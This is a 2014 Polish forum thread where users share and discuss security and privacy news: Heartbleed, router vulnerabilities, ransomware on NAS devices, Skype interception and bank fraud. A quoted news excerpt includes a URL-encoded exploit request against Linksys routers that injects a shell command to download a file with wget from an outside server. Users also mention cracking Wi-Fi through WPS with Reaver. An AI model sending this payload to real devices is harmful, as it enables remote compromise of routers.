Forum CDRinfo.pl

Forum CDRinfo.pl (https://forum.cdrinfo.pl/)
-   Komputery - oprogramowanie i sprzęt (https://forum.cdrinfo.pl/f113/)
-   -   Takie tam o bezpieczeństwie i prywatności (https://forum.cdrinfo.pl/f113/takie-tam-o-bezpieczenstwie-prywatnosci-93117/)

revolver0 01.09.2014 22:40

Zdjęcia już naprawili.

andy 01.09.2014 21:30

Ludzie dzielą się na dwie grupy:
- tych co dbają o prywatność
- tych co dbać będą :D

http://niebezpiecznik.pl/post/wyciek...-joanny-krupy/


Apple dziękujemy (:

sobrus 05.08.2014 09:08

Dlatego czasem najlepiej mieć custom rzeźbę :ysz:

Berion 05.08.2014 00:03

A jaką masz pewność, że ich serwery jeszcze funkcjonują i Ci odszyfrują? NIE PŁACIĆ!

A profilaktycznie, izolować zasoby.

andy 04.08.2014 23:12

Z terrorystami się nie negocjuje.

revolver0 04.08.2014 22:52

Zawsze można zapłacić te 0,6 BTC czyli jakieś 352.83$. Ciekawi mnie natomiast czy po wpłaceniu, odszyfruje się dane czy może i pieniądze i dane pójdą w ....

M@X 04.08.2014 22:38

Na szczescie nie mam zewnetrznego IP. :spoko:

andy 04.08.2014 22:10

Cytat:

Jak informują użytkownicy Synology (zwłaszcza ci, którzy dawno nie aktualizowali oprogramowania w swoich NAS-ach i mają je wystawione do internetu), po sieci grasuje nowy robak który uzyskuje dostęp do NAS-a i zaczyna szyfrować jego zasoby domagając się okupu za ich rozszyfrowanie ***8212; schemat działania odpowiada więc złośliwemu oprogramowaniu znanemu pod nazwą CryptoLocker, które od lata atakuje komputery (a od niedawna także telefony komórkowe).
http://niebezpiecznik.pl/post/jesli-...ocker-w-akcji/

andy 03.08.2014 21:49

Jeżeli ktoś jeszcze nie słyszał o tym to radzę się zapoznać.

Cytat:

Problem ma leżeć w kontrolerze USB (w urządzeniu), który pełni rolę pośrednika pomiędzy podpinanym do komputera urządzeniem USB a systemem operacyjnym. Chip kontrolera ma własny firmware, który m.in. definiuje jakiej klasy jest urządzenie (dysk, klawiatura zewnętrzna, karta sieciowa, itp.). To właśnie jego nadpisanie może wyposażyć niewinne urządzenie USB w dodatkowe, złośliwe funkcje ***8212; np. imitowanie klawiatury, która w tle, przy pomocy odpowiednich skrótów klawiszowych systemu operacyjnego, wykona polecenia pobrania złośliwego oprogramowania. Przykładową infekcję komputera i podpięcie go do botnetu po wpięciu odpowiedniej wtyczki w port USB, badacze zademonstrowali dziennikarzom Zeitu.
http://niebezpiecznik.pl/post/kazdy-...jest-dziurawy/

sobrus 01.05.2014 09:43

Moim zdaniem wszystkiemu winna jest nowa moda, która zadebiutowała bodajże u Apple.

Jeżeli użytkownik chce kupować programy przez dystrybucję cyfrową jednym mlaśnięciem palca, mieć sensowny sklep w systemie itd, to siłą rzeczy ktoś musi ten sklep prowadzić i mieć wpływ na to co się w nim znajdzie co nie.
I ten ktoś musi mieć możliwość zidentyfikowania użytkownika i możliwość pobierania od niego płatności, i to co się kupi jest uwiązane do konta.
I oczywiście będzie miał listę oprogramowania zainstalowanego na komputerze, bo niby jak inaczej? Czy Google i Apple nie mają takich list? Oczywiście że mają, przecież nie będą udawać, że nie widziały co użytkownik kupował. To byłoby idiotyczne.

Powiem to więc wprost: wygoda nie sprzyja bezpieczeństwu i dobrym rozwiązaniom.

Oczywiście ktoś powie "powinienem mieć możliwość wyboru dostawcy oprogramowania".
Spoko, więc niech się przygotuje na to że będzie musiał podzielić się prywatnymi danymi z wieloma firmami, a nie z jedną. Bo każdy program może być dostępny w innym sklepie.
I jak będzie musiał wklepać dziesięć loginów i haseł, skonfigurować na każdym kartę płatniczą i pamiętać czy program X był w sklepie Y czy Z, a do tego od czasu do czasu zobaczy "connection error, try again later, bye" - to szybko przekona się że wcale to nie takie wygodne.

Czepianie się mechanizmów zabezpieczeń też jest bez sensu, skoro to firmy trzecie wymagają tego na Microsofcie. Czy na Linuksie można odtworzyć BluRay? Niestety nie.
Zapytajmy więc Kowalskiego czy woli mieć AACS i oglądać filmy, czy nie mieć i nie oglądać.

I nie winie Microsoftu za to, że dopasowuje się do obecnych czasów kosztem zmieniania dobrego na gorsze, bo właśnie tego świat oczekuje.
Wygoda i zwolnienie użytkownika od myślenia.

andy 30.04.2014 23:23

Stallman daje ciekawe argumenty na poparcie swojej tezy.
Cytat:

Sprawa z Vistą to jednak drobiazg w porównaniu do Trusted Platform Module 2.0, debiutującym w Windows 8. Za sprawą wprowadzenia tego rozwiązania eksperci niemieckiego federalnego urzędu BSI (Bundesamt für Sicherheit in der Informationstechnik) uznali nowy system Microsoftu za zagrożenie dla bezpieczeństwa dla firm i władz, rekomendując pozostanie przy Windows 7 do 2020 roku, a później poszukanie jakichś innych rozwiązań.
Do złośliwości zaliczono też to, że Windows Store ***8211; jedyny sposób na dystrybucję aplikacji dla mobilnych wersji Windows ***8211; zrywa z dotychczasową swobodą dystrybucji oprogramowania na ***8222;okienka***8221;, cenzurując wybór software'u dla swoich użytkowników. Same zaś urządzenia z mobilnymi wersjami Windows to tyrany (nasz neologizm dla języka polskiego, na wzór agenci-agenty ***8211; przyp.red.), gdyż uniemożliwiają użytkownikom instalowanie innych systemów operacyjnych. Nie inaczej potraktowano wprowadzenie mechanizmów DRM do Windows, w szczególności mechanizmu AACS, chroniącego płyty Blu-ray przed kopiowaniem.
Kolejnymi argumentem na rzecz postrzegania microsoftware jako malware ma być wprowadzenie do Windows funkcji spyware: gromadzenie przez Windows Update list oprogramowania zainstalowanego na komputerze, śledzenie lokalnych wyszukiwań w Windows 8.1 przez Bing, czy też obecność w bibliotece advapi.dll dodatkowego specjalnego klucza dostępowego, który w jednej z testowych wersji systemu niedyskretnie otrzymał etykietę ***8222;NSAKEY***8221;.
http://www.dobreprogramy.pl/Free-Sof...ews,54037.html

sobrus 10.04.2014 19:04

Właśnie się dowiedziałem w TV, już instaluje mi się poprawka na ten błąd (1.0.1g)....

Wygląda poważnie, lepiej pozmieniać hasła.
https://en.wikipedia.org/wiki/Heartbleed_bug

andy 10.04.2014 19:00

Dobrze jest mieć oddzielne hasła do serwisów (:
Cytat:

Większość z Was pewnie czytała już o najnowszym błędzie w OpenSSL. Zagrożenie nie jest teoretyczne ***8211; mamy dowody na to, że hasła użytkowników największych polskich i światowych serwisów wyciekały lub nadal wyciekają.
Błąd, nazwany Heartbleed, polega na wysyłaniu przez serwer własnej pamięci w porcjach po 64 kilobajty w odpowiedzi na każde odpowiednio skonstruowane zapytanie. Pamięć pochodzi z właśnie uwolnionego obszaru procesu Op
http://zaufanatrzeciastrona.pl/post/...miencie-hasla/

kid86 25.03.2014 18:13

Ewentualnie mo***380;na korzysta***263; z sieci TOR, jednak chodzi to bardzo topornie.

sobrus 24.03.2014 09:59

Cytat:

Napisany przez andy (Post 1278408)
Z pozdrowieniami dla wszystkich, którzy przesiedli się z konta GMail na Outlooka/Hotmail z myślą, że ta firma jest "lepsza" :D

Ja i tak od nich uciekam. Nie dość że cały serwis pracuje według mnie jakoś wolniej od gmaila, to jeszcze raz na jakiś czas prosi o zalogowanie się na konto i wpisanie captcha (inaczej tracimy możliwość wysyłania poczty).
Oczywiście wysyłana wiadomość przepada (!). Przynajmniej w thunderbirdzie.

Korzystanie z programów pocztowych to udręka, przereklamowany ten outlook.

andy 23.03.2014 23:25

Raczej oczywista oczywistość ;)

Cytat:


Orange szpieguje swoich klientów i współpracuje z agencjami wywiadowczymi





Jak wynika z najnowszych doniesień, największy francuski koncern telekomunikacyjny - Orange - udostępnia informacje o swoich klientach służbom wywiadowczym. Pojawiają się również stwierdzenia, że odbywa się to... bez jakiejkolwiek formy kontroli.

Informacje opublikował jeden z większych, francuskich dzienników. Według danych zaczerpniętych z należącego do brytyjskiej agencji Government Communications Headquarters dokumentu Orange już od lat współpracuje z francuską agencją wywiadu wojskowego i strategicznego, udostępniając jej dane generowane przez swoich klientów (np. wiadomości SMS).



http://www.conowego.pl/aktualnosci/o...owczymi-11360/

----

Huawei zhakowane? :)
http://niebezpiecznik.pl/post/nsa-zhackowalo-huawei/

andy 20.03.2014 23:53

Z pozdrowieniami dla wszystkich, którzy przesiedli się z konta GMail na Outlooka/Hotmail z myślą, że ta firma jest "lepsza" :D
Cytat:

Wczoraj aresztowano pracownika Microsoftu, który sfrustrowany wynikami oceny przesłał francuskiemu blogerowi fragmenty Windows 8 przed premierą systemu. Microsoft wytropił sprawcę wycieku analizując konto Hotmail blogera.
Cytat:

Teraz czas na prawdziwą wisienkę na torcie, mianowicie odpowiedź na pytanie, jakim prawem Microsoft zajrzał do prywatnej skrzynki niezależnego blogera. Otóż mógł w tym celu skorzystać z odpowiedniego zapisu w regulaminie usługi, którego nikt nie czyta, ale wszyscy akceptują. Punkt 5.2 mówi:

Does Microsoft disclose my personal information outside of Microsoft? You consent and agree that Microsoft may access, disclose, or preserve information associated with your use of the services, including (without limitation) your personal information and content, or information that Microsoft acquires about you through your use of the services (such as IP address or other third-party information) when Microsoft forms a good faith belief that doing so is necessary (a) to comply with applicable law or to respond to legal process from competent authorities; (b) to enforce this agreement or protect the rights or property of Microsoft or our customers; or (c) to help prevent a loss of life or serious physical injury to anyone.

W skrócie: Użytkownik wyraża zgodę na na przetwarzanie wszystkich informacji na jego temat, które posiada Microsoft, m. in. w celu ochrony praw lub własności Microsoftu. Wygląda za to, że choć oburzające, to działania Microsoftu miały pokrycie we wcześniejszej zgodzie, wyrażonej przez użytkownika.
http://zaufanatrzeciastrona.pl/post/...konto-hotmaila

andy 18.03.2014 22:59

Cytat:

CHIPSEC: Platform Security Assessment Framework
CHIPSEC is a framework for analyzing security of PC platforms including hardware, system firmware including BIOS/UEFI and the configuration of platform components. It allows creating security test suite, security assessment tools for various low level components and interfaces as well as forensic capabilities for firmware
CHIPSEC can run on any of these environments:
  1. Windows (client and server)
  2. Linux
  3. UEFI Shell
NOTE: This software is for security testing purposes. Use at your own risk.
https://github.com/chipsec/chipsec

andy 05.03.2014 19:35

Ilość załączników: 1
Cytat:

Niepokojąca sugestia o błędzie w obsłudze SSL w produktach Apple

04 marca 2014, 10:14 | Aktualności | Komentarze: 4
Tagi: Apple, iOS, SSL
Niedawno na blogu Bruce Schneiera znalazł się wpis ***8220;Was the iOS SSL Flaw Deliberate?***8221; Zastanawia się w nim, czy poważny błąd dotyczący SSL na pewno pojawił się na skutek pomyłki. Twierdzi, że idealna tylna furtka (backdoor) w oprogramowaniu powinna mieć trzy cechy:
  • niskie prawdopodobieństwo wykrycia,
  • łatwość wyparcia się jej autorstwa w przypadku ujawnienia,
  • małe wymagania odnośnie udziału innych osób w przedsięwzięciu.
Według autora, błąd w obsłudze SSL spełnia te warunki, jeśli założymy iż powstał celowo. Pewna instrukcja w jednym miejscu została wpisana dwukrotnie. Jednak wykonanie pierwszej z nich było opatrzone warunkiem, natomiast druga była bezwarunkowa. Ten fragment kodu zawierał kolejne instrukcje warunkowe, które z powodu wspomnianego błędu już nie były wykonywane i pozwalały na przeprowadzenie ataku na zestawianie szyfrowanego połączenia.



Załącznik 65228

http://sekurak.pl/niepokojaca-sugest...duktach-apple/



---


iPhone 5s śledzi Twój ruch nawet po wyłączeniu urządzenia



Cytat:

Samo śledzenie ruchu jest ciekawą funkcjonalnością dostępną w najnowszych iPhone***8217;ach ***8211; przydaje się choćby przy współpracy z aplikacjami ułatwiającymi zapis i analizę aktywności ruchowej / tworzeniu planów fitness itp. Kto by jednak pomyślał, że także po wyłączeniu, telefon również zapisuje pewne informacje o ruchu użytkownika***8230;
Taką właśnie ciekawostką podzielił się na reddicie jeden z posiadaczy iPhone 5s. Najpierw zepsuł mu się kabel do zasilania telefonu, więc przez pełne 4 dni telefon był wyłączony (rozładowana bateria). Ale o dziwo, po naładowaniu urządzenia, skomunikowało się ono z oprogramowaniem liczącym kroki ***8211; udostępniając pełne statystyki za 4 dni podczas których ***8216;nie było zasilania***8217;.
Użytkownik wykorzystywał przy tym jedną z aplikacji (Argus) umożliwiającą komunikację z dedykowanym procesorem ruchu M7 (dostępnym w iPhone 5S) , który rzeczywiście potrafi działać w środowisku ***8216;low power level***8216;. ;-)
http://sekurak.pl/iphone-5s-sledzi-t...iu-urzadzenia/


----
Apple recently made a booboo, unlike any other booboo in the history of programming. Even though Apple***8217;s bug is unprecedented, here***8217;s a brief overview of some predecessor bugs.

http://www.tedunangst.com/flak/post/...one-line-fixes

sobrus 01.03.2014 12:07

Jak o tym przeczytalem (mam Neostrade) to puscilem caly ruch przez proxy z na sztywno wpisanym opendns . Bardzo niefajna wpadka , a z aktualizacjami nikt sie nie spieszy.

gallus 01.03.2014 12:00

Ja trafiłem na razie podmienione dns-y tylko u jednego ze znajomych, całe szczęście orange się zorientowało i blokowało ruch po podmianie.

chris996 01.03.2014 01:26

Ku przestrodze:

Stracił 16 000 PLN bo miał dziurawy router.
Prawie 1,2 miliona Polaków może być podatnych na ten atak!

andy 22.02.2014 14:14

Cytat:

W dniu 30 stycznia 2014 r. Sąd Apelacyjny we Wrocławiu (sygn. akt I ACa 1452/13) rozstrzygnął prawomocnie ten istotny spór ***8211; oddalając apelację powoda i w efekcie przyznając słuszność administratorowi portalu.
Cytat:

Spór toczył się przez blisko 3 lata. Sporne, czarno-białe zdjęcia (zrobione w szkole podstawowej, ponad 30 lat temu) zostały zamieszczone w portalu przez byłych uczniów klasy, do której uczęszczał również powód. Jedno ze zdjęć zostało opatrzone podpisem, w którym inny użytkownik portalu wskazał imiona i nazwiska niektórych uwiecznionych na nim osób.
Powód dochodząc usunięcia swojego wizerunku z portalu powoływał się na ochronę wynikającą z prawa autorskiego, z regulacji dotyczących danych osobowych oraz wreszcie na przepisy dotyczące dóbr osobistych.
Cytat:

Czekając na pisemne uzasadnienie orzeczenia Sadu Apelacyjnego, jako podsumowanie można przytoczyć słowa Sądu Okręgowego we Wrocławiu, który orzekając w I instancji stwierdził ***8211; ***8222;Mówiąc potocznie, nic złego się nie stało i stać się nie mogło***8221;.
http://www.olesinski.com/spor-o-publ...ie-zakonczony/

--

Cytat:

Polska występuje na liście 21 krajów, w których zlokalizowano serwery odbierające ruch z inwigilowanych komputerów. Występujemy w zaszczytnym gronie krajów takich jak Kolumbia, Panama, Oman, Arabia Saudyjska, Zjednoczone Emiraty Arabskie, Egipt, Etiopia, Maroko, Sudan, Nigeria, Kazachstan, Azerbejdżan, Malezja, Tajlandia, Uzbekistan, Włochy, Węgry, Meksyk i Korea Południowa.
http://zaufanatrzeciastrona.pl/post/...cego-obywateli


Cytat:

Na czym polega atak

Odkryto, że nie dość, że jeden z parametrów skryptu obsługującego blokowanie i odblokowywanie stron dostępnych za pomocą rutera jest podatny na wstrzyknięcie dowolnego polecenia powłoki, to na dokładkę wykonanie tego skryptu odbywa się bez weryfikacji uprawnień użytkownika.
Przykładowy atak wygląda tak:
POST /tmUnblock.cgi HTTP/1.1 Host: 192.168.0.1:8080 User-Agent: Mozilla/4.0 (compatible; MSIE 4.01; Mac_PowerPC) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.0.1:8080/ Authorization: Basic YWRtaW46JmkxKkBVJDZ4dmNH Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 518 %73%75%62%6d%69%74%5f%62%75%74%74%6f%6e%3d&%63%68% 61%6e%67%65%5f%61%63 %74%69%6f%6e%3d&%73%75%62%6d%69%74%5f%74%79%70%65% 3d&%61%63%74%69%6f %6e%3d&%63%6f%6d%6d%69%74%3d%30&%74%74%63%70%5f%6e %75%6d%3d%32&%74%74 %63%70%5f%73%69%7a%65%3d%32&%74%74%63%70%5f%69%70% 3d%2d%68%20%60%63 %64%20%2f%74%6d%70%3b%69%66%20%5b%20%21%20%2d%65%2 0%2e%4c%32%36%20 %5d%3b%74%68%65%6e%20%77%67%65%74%20%68%74%74%70%3 a%2f%2f%xx%xx%2e %xx%xx%xx%2e%xx%xx%xx%2e%xx%xx%xx%3a%31%39%33%2f%3 0%52%78%2e%6d%69 %64%3b%66%69%60&%53%74%61%72%74%45%50%49%3d%31 Autoryzacja co prawda jest wymagana, jednak hasło podane przez użytkownika nie jest weryfikowane.
http://zaufanatrzeciastrona.pl/post/...terow-linksysa

sobrus 13.02.2014 19:01

Było już na forum, ale w tym temacie nie.
Jeżeli komuś zależy na odrobinie prywatności w internecie.
To jest fajny dodatek do przeglądarek:

Ghostery

Jak się okazuje nie ma już praktycznie stron bez zamontowanego tropiciela ....
Większość ma po kilka.

andy 04.02.2014 00:13

Dodatkowo należy dodać, że jak ktoś ma słaby główny klucz to też złamanie tego nie jest trudne :) Wystarczy przechwycić hendszejka i kilka dni zabawy ze słownikiem (mam ok 14mln słów :D) + brute force na krótkie frazy, łatwe frazy :)

chris996 03.02.2014 23:53

Temat o bezpieczeństwie to dorzucę coś od siebie. Info przydatne dla osób co szyfrują sieć WIFI.
Jakiś czas temu przed świętami bawiłem się w hakowanie własnej sieci WIFI (szyfrowanie WPA2) i trafiłem na taki artykuł:
Reaver ***8211; program do hackowania Wi-Fi WPA/WPA2 (poprzez dziurę w WPS)

Tak jak napisano w artykule, dzięki programowi Reaver możliwe jest uzyskanie kluczy WPA/WPA2, jeśli ruter ma włączony WPS.
U mnie w TP-LINK mam QSS.
Cóż, nawet taką sieć WIFI z WPA2, można z łatwością złamać i szyfrowanie WPA2 w takim przypadku nic nie daje :P

Berion 03.02.2014 21:33

Problem znika w przypadku dodatkowych źródeł entropii.

andy 03.02.2014 20:08

Ciekawe czy to jest rzeczywistością...
http://sekurak.pl/trojan-w-tranzysto...a-szyfrowanie/

Cytat:

Międzynarodowy zespół naukowców opracował bardzo interesującą i potencjalnie niezwykle skuteczną metodę wprowadzania złośliwych funkcji do komputerowych układów elektronicznych. Pomysł nie polega tu jednak na stosunkowo łatwym do wykrycia przeprojektowaniu samego układu, lecz na wprowadzeniu zmian w strukturze i zachowaniu samych tranzystorów!

Patrix 03.02.2014 19:52

Cytat:

Napisany przez andy (Post 1274586)

to też mnie przekonało do przejścia na dd-wrt (hw dlink) ;)

sobrus 03.02.2014 11:54

Hmm, co prawda nie mam tego routera, ale mam popularnego i taniego Sagema od orange.
Wyglada na to, że lepiej będzie zapytania DNS rozwiązywać na serwerze proxy (za dwoma firewallami) niż pytać router.

ed hunter 03.02.2014 09:54

Nihil novi sub sole. :]

andy 02.02.2014 23:19

Cytat:

Jak złodzieje zrobili przelew w mBanku bez kodu z SMS-a?

Bystry czytelnik mógł to już wywnioskować z zrzutu ekranu powyżej. W przypadku mBanku przestępcy nie mieli możliwości wykorzystania błędu logicznego, który pojawia się w niektórych bankach ***8212; musieli więc skorzystać z socjotechniki, aby przekonać ofiarę do samodzielnego zdefiniowania w ramach jej konta nowego ***8220;zaufanego odbiorcy przelewu***8220;. Odbiorca taki charakteryzuje się tym, że wysyłane na jego rachunek przelewy nie muszą być potwierdzane jednorazowym kodem z SMS-a.
Ofierze sprzedali historię, że procedura ta ma na celu dodanie nowego formatu numeru rachunku bankowego do jej konta, wymaganego ze względu na niedawne i głośne w mediach połączenie mBanku z Multibankiem (piękna zagrywka!) ***8230;i ofiara na to poszła. Krótko mówiąc: ofiara przepisała podstawiony przez atakujących numer konta, dostała SMS-a z kodem i wpisała go na fałszywej stronie mBanku (w tym czasie atakujący, którzy byli zalogowani na faktyczne konto ofiary, równolegle odtwarzali rzeczy wpisywane przez ofiarę informacje, łącznei z kodem z SMSa)
http://niebezpiecznik.pl/post/straci...h-na-ten-atak/

andy 30.01.2014 12:25

Bezpieczeństwo i Apple


--

Cytat:

Atakujący wykonał telefon do PayPala, i podszywając się pod pracownika udało mu się uzyskać 4 ostatnie cyfry numeru karty kredytowej Naoki. Ujawnił też, jak się przed tym zabezpieczyć: wystarczy zadzwonić do PayPala i poprosić, aby przy naszym koncie odnotowano ***8220;nie udzielać informacji przez telefon***8220;.
Mając 4 ostatnie cyfry numeru karty kredytowej zadzwonił do GoDaddy i powiedział, że zgubił kartę, ale pamięta jej ostatnie 4 cyfry. Wszystko wskazuje na to, że obsługa techniczna potrzebowała jeszcze 2 pierwszych cyfr numeru karty, ale ***8230;pozwoliła atakującemu na ich zgadywanie (!!!). Udało się to ponoć za pierwszym podejściem ***8212; co zresztą nie jest bardzo zaskakujące, jeśli ktoś wie, że numer karty kredytowej podlega ścisłej regulacji ISO, i wszystkie karty płatnicze zaczynają się głównie od 4 lub 5, a potem następuje (także znany) identyfikator banku. Wiedząc jakie banki są w danym kraju***8230;
http://niebezpiecznik.pl/post/jak-pr...-znajac-hasla/

andy 24.01.2014 23:39

Nieświadomi użytkownicy przesyłają swoje dokumentu do galerii szablonów :)

http://antyweb.pl/prywatne-dokumenty...-google-drive/


Boshe... CV, podania o premie...

andy 20.01.2014 23:28



Cytat:

This project:

  • Detects IMSI based device location tracking
  • Provides counter measures for device tracking
  • Can provide swarm-wise-decision-based cellular service interruption
  • Can provide secure wifi/wimax alternative data routes through MESH-like networking
  • Detect and prevent remote hidden application installation
  • Detect and prevent remote hidden SMS-based SIM attacks
  • Prevent or spoof GPS data
  • Does NOT secure any data transmissions
  • Does NOT prevent already installed rogue application from full access

https://github.com/SecUpwN/Android-I...tcher-Detector

sobrus 17.01.2014 20:53

Obecnie prywatność jest w fatalnym stanie.
Pamietasz jak narzekałem że ustawienia w moim telefonie same się zmieniały przy okazji instalacji nowej wersji usług Google Play?

Ostatnio gdzieś czytałem (niestety nie pamiętam gdzie), że Facebook stosuje właśnie taką technikę.
Przy okazji update serwisu ustawienia prywatności użytkowników zostają zresetowane (ze względów technicznych) a wtedy firmy napełniają swoje bazy danych prywatnymi informacjami zanim posiadacze profilów znów ich nie zabezpieczą.
Nawiasem mówiąc FB nie przestrzega nawet swojej własnej polityki prywatności co jest dość przerażające.

Ale to i tak już pewnie nieaktualne, bo z tego co czytałem ustawienia prywatności na FB mają zniknąć i jedynym sposobem na zablokowanie dostępu do swoich prywatnych danych będzie ręczne zablokowanie wszystkich milionów użytkowników FB których nie znamy :rotfl:

Zdzierając spokojnie prywatność z frajerów którzy korzystają z jego serwisu (jak sam się o nich kiedyś wyraził) Mark Zuckenberg dbając o własną prywatność wykupił za 30 milionów $ teren naokoło swojego domu.
I ciekawe na czym zebrał taką fortunę jak nie na sprzedaży prywatnych danych :hmm:

andy 17.01.2014 20:02

Ilość załączników: 1
"Oto świetne podsumowanie znaczenia metadanych. Z dedykacją dla tych, którzy bagatelizują masowe zbieranie metadanych przez służby, argumentując, że przecież metadane nie ujawniają ***8221;treści***8221; komunikatów wymienianych pomiędzy inwigilowanymi osobami." - Niebezpiecznik


Berion 17.01.2014 17:50

Luka znana od 2004 roku. Podobno. Zupełny przypadek. :)

Im więcej takich newsów tym większą mam ochotę na nieoficjalne fw... którą to wgrania próbę przypłacił życiem mój D-Link. ;p

andy 16.01.2014 22:41

Dziura w TP-Linkach i Pentagramach ***8211; ponad milion polskich routerów podatnych na ataki.
http://niebezpiecznik.pl/post/dziura...-m-in-tp-link/

--

Cytat:

Description: Automater is a URL/Domain, IP Address, and Md5 Hash OSINT tool aimed at making the analysis process easier for intrusion Analysts. Given a target (URL, IP, or HASH) or a file full of targets Automater will return relevant results from sources like the following: IPvoid.com, Robtex.com, Fortiguard.com, unshorten.me, Urlvoid.com, Labs.alienvault.com, ThreatExpert, VxVault, and VirusTotal.
http://www.tekdefense.com/automater/

misiozol 15.01.2014 12:21

He ciekawy temat zarzuciles , jesli idzie o slowo bezpieczenstwo i internet to te slowa sa odlegle jak 2 konce naszego wszechswiata :D

andy 15.01.2014 09:28

Cytat:

Szwedzki serwis TechWorld opisał problem z konfigurację ruterów Asusa. Niektóre modele posiadają funkcję AiDisk, która umożliwia łatwe udostępnienie plików z podłączonego do urządzenia dysku USB w sieci lokalnej. Udostępnienie następuje za pomocą protokołu FTP ***8211; ruter otwiera port 21 i serwuje pliki z dysku. Problem polega jednak na tym, że domyślnie sugerowana konfiguracja usługi otwiera port 21 nie tylko dla sieci lokalnej, ale od razu dla całego internetu i pozwala na logowanie bez hasła użytkownikowi anonymous.
http://zaufanatrzeciastrona.pl/post/...i-uzytkownikow

andy 12.01.2014 13:55

Takie tam o bezpieczeństwie i prywatności
 
ot taki główny temat w którym będzie można dyskutować o bezpieczeństwie i prywatności.

Poniżej ostatnie ciekawe artykuły oraz prezentacje które widziałem:





Cytat:

Odczytywanie treści czatu

Kilka dni temu jeden z pracowników firmy Blue Coat, wdrażającej platformy umożliwiające inspekcję ruchu internetowego, został zapytany, czy oferowany przez niego produkt potrafi zrekonstruować konwersację tekstową prowadzoną za pomocą Skype***8217;a. Był zaskoczony tym pytaniem, ponieważ trwał w przekonaniu, że to niemożliwe, podczas kiedy osoba go pytająca twierdziła, że da się to zrobić. Przyjrzał się zatem ruchowi Skype***8217;a i potwierdził, że faktycznie jest to wykonalne.
Krótki eksperyment pozwolił ustalić, ze faktycznie w najnowszym kliencie Skype informacje przesyłane za pomocą czatu są jedynie szyfrowane z użyciem protokołu TLS ***8211; nie ma już mowy o szyfrowaniu całej komunikacji za pomocą algorytmu AES. Przeprowadzając atak typu MiTM na sesję TLS, badacz mógł zobaczyć treść odszyfrowanej komunikacji pomiędzy dwoma testowymi klientami Skype***8217;a.
http://zaufanatrzeciastrona.pl/wp-co...01/skype01.jpg Fragment rozmowy i zawartość pakietu (źródło: Blue Coat)

Oczywiście wiadomości przesyłane są do serwerów Microsoft, gdzie mogą zostać w każdym przypadku przechwycone i zarejestrowane. Przy okazji badacz odkrył coś jeszcze.
Wystarczy dobry certyfikat

Okazuje się, że do przeprowadzenia ataku MiTM nie potrzeba wcale być posiadaczem certyfikatu SSL Microsoftu. Wystarczy do tego celu dowolny certyfikat, któremu zaufa podsłuchiwany komputer ***8211; niestety klient Skype***8217;a nie posiada ograniczenia listy zaufanych certyfikatów. Oznacza to, że atak, umożliwiający podsłuchanie rozmowy nawet bez udziału Microsoftu może przeprowadzić każdy atakujący, który może wystawić zaufany certyfikat SSL dla odpowiedniej domeny. Nie jest to dobra wiadomość. Zapewne jeszcze rok temu uważalibyśmy tego rodzaju atak za mało prawdopodobny, jednak po ostatnich rewelacjach Snowdena trudno zachować podobny optymizm.
Jeśli temat interesuje Was od strony technicznej, na stronie Blue Coat znajdziecie zrzuty pakietów oraz dużo więcej obserwacji na temat protokołu Skype***8217;a, w tym również rozmów głosowych (na razie nie udało się ich odszyfrować, choć dostępne są pewne metadane). Przypominamy także, że ciągle działa opisywana przez nas sztuczka pozwalająca każdemu na ustalenie adresu IP dowolnego użytkownika Skype***8217;a, jeśli tylko użytkownik ten logował się przez ostatnie 48 godzin.
Jak uniknąć bycia podsłuchanym?

Jeśli ktoś lubi kombinować i jest wielkim miłośnikiem Skype***8217;a to polecamy zapoznanie się z polskim programem SkypeHide, który umożliwia wykorzystanie Skype***8217;a do steganografii. Jeśli ktoś jednak szuka prostszego rozwiązania, to może przydać się lektura skompilowanej przez nas listy potencjalnie bezpieczniejszych rozwiązań.

405 104Lubię to! 3
Podobne wpisy






http://zaufanatrzeciastrona.pl/post/...-swojego-czatu

Cytat:

Folia aluminiowa w rękach złodzieja kojarzy się głównie z wyłożoną nią torbą ***8220;na fanty***8221;. Schowane w takiej torbie produkty są de facto zamknięte w klatce Faraday***8217;a i ***8220;niewidzialne***8221; dla sklepowych bramek. Ale okazuje się, że jest jeszcze jedno złodziejskie zastosowanie folii aluminiowej***8230;
http://niebezpiecznik.pl/post/jak-fo...kradac-sklepy/

Cytat:

Niewiele osób zdaje sobie sprawę z tego, że karty *SD to tak naprawdę małe komputery. Można nadpisać ich firmware i uruchomić na karcie własny kod, co umożliwia przeprowadzenie ataków Man in the Middle. Tak, nie przywidziało wam się, można uruchomić kod bezpośrednio w pamięci karty***8230;
http://niebezpiecznik.pl/post/hackow...owac-rootkita/









Wszystkie czasy w strefie CET. Aktualna godzina: 22:37.

Powered by vBulletin® Version 3.9.0 LTS
Copyright ©2000 - 2026, vBulletin Solutions Inc.